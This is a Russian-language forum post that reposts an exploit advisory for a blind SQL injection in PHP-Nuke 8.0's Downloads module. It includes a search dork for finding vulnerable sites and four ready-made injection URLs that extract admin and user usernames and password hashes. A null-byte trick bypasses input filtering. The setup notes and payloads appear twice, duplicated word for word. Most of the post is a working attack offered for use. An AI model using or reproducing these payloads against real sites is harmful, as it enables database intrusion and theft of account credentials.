#####################################################################################
#### PHP-Nuke 8.0 Downloads слепая Sql Injection ####
#####################################################################################
# #
#Обнаружил: Sina Yazdanmehr (R3d.W0rm) #
#Оф. сайт : http://r3dw0rm.ir #
#####################################################################################
# #
#Download : http://phpnuke.org #
# #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #
# #
#####################################################################################
# [Bug] #
# #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
# #
#####################################################################################
# [Примечание] #
# #
#1. magic_quotes_gpc = Off #
#2. register_globals = On #
#3. Для использования ошибки вы должны быть простым пользователем. #
#4. После использования ошибки пойти на этот URL: #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker_at_devil.net&title=zz&url=zz&description=zz
#5. Я использую ASCII-коды и нулевой байт в URL для обхода безопасности функции#
# Пожалуйста, не изменяйте код ascii и %00. #
# #
###################################### TNX GOD ######################################
Добавлено в [time]1232742344[/time]
Извиняюсь если не туда... )) bugtraq не нашёл... :baby:
А надо бы создать... для особенных случаев
Запостил потому что не на секлабе не на милворме нету
#### PHP-Nuke 8.0 Downloads слепая Sql Injection ####
#####################################################################################
# #
#Обнаружил: Sina Yazdanmehr (R3d.W0rm) #
#Оф. сайт : http://r3dw0rm.ir #
#####################################################################################
# #
#Download : http://phpnuke.org #
# #
#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #
# #
#####################################################################################
# [Bug] #
# #
#Admin Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password : http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker_at_devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
# #
#####################################################################################
# [Примечание] #
# #
#1. magic_quotes_gpc = Off #
#2. register_globals = On #
#3. Для использования ошибки вы должны быть простым пользователем. #
#4. После использования ошибки пойти на этот URL: #
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&email=attacker_at_devil.net&title=zz&url=zz&description=zz
#5. Я использую ASCII-коды и нулевой байт в URL для обхода безопасности функции#
# Пожалуйста, не изменяйте код ascii и %00. #
# #
###################################### TNX GOD ######################################
Добавлено в [time]1232742344[/time]
Извиняюсь если не туда... )) bugtraq не нашёл... :baby:
А надо бы создать... для особенных случаев
Запостил потому что не на секлабе не на милворме нету